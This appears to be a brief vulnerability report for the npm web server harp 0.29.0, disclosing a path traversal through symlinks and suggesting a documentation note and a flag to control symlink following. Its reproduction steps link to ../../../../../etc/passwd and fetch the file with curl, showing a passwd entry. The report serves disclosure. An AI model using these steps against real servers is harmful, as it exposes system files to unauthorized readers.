In reference to #453820
module name: harpversion:0.29.0npm page: https://www.npmjs.com/package/harp
zero-configuration web server with built in pre-processing
2,679 downloads in the last week
Path traversal using symlink.
Similar to #403703. It can be used to list any file in another folder of web root.
yarn global add harp
harp server
$ ln -s ../../../../../etc/passwd sympasswd
$ curl --path-as-is 0.0.0.0:9000/sympasswd
root:x:0:0:root:/root:/bin/bash
...
Educating users about this behaviour in the docs and probably providing a flag to disable/enable following symlinks.
You can access files outside project directory through server via symlink.